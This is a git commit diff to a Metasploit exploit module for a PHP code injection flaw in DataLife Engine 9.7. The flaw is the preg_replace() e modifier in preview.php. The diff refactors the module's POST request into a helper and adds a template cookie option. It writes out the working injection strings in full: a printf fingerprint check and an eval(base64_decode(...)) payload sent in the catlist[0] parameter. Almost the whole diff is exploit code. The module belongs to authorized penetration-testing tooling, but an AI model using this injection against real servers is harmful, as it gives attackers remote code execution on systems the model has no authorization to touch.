added template stuff improve

2013-02-01 11:53:42 +01:00 · 2013-02-01 11:53:42 +01:00 · bf7bb9952e
parent de8572d934
commit bf7bb9952e
1 changed files with 18 additions and 16 deletions
--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@ -18,8 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
 				The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
-				with the e modifier, which allows to inject arbitrary php code, when the template
-				in use contains a [catlist] or [not-catlist] tag.
+				with the e modifier, which allows to inject arbitrary php code, when there is a
+				template installed which contains a [catlist] or [not-catlist] tag, even when the
+				template isn't in use currently. The template can be configured with the TEMPLATE
+				datastore option.
 			},
 			'Author'         =>
 				[
@ -49,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote

 		register_options(
 			[
-				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
+				OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
 			], self.class)
 	end

@ -57,17 +60,24 @@ class Metasploit3 < Msf::Exploit::Remote
 		normalize_uri(target_uri.path, 'engine', 'preview.php')
 	end

-	def check
-		fingerprint = rand_text_alpha(4+rand(4))
+	def send_injection(inj)
 		res = send_request_cgi(
 			{
 				'uri'       =>  uri,
 				'method'    => 'POST',
 				'vars_post' =>
 					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
-					}
+						'catlist[0]' => inj
+					},
+				'cookie'   => "dle_skin=#{datastore['TEMPLATE']}"
 			})
+		res
+	end
+
+	def check
+		fingerprint = rand_text_alpha(4+rand(4))
+
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")

 		if res and res.code == 200 and res.body =~ /#{fingerprint}/
 			return Exploit::CheckCode::Vulnerable
@ -80,14 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		@peer = "#{rhost}:#{rport}"

 		print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
-		res = send_request_cgi(
-			{
-				'uri'       =>  uri,
-				'method'    => 'POST',
-				'vars_post' =>
-					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
-					}
-			})
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
 	end
 end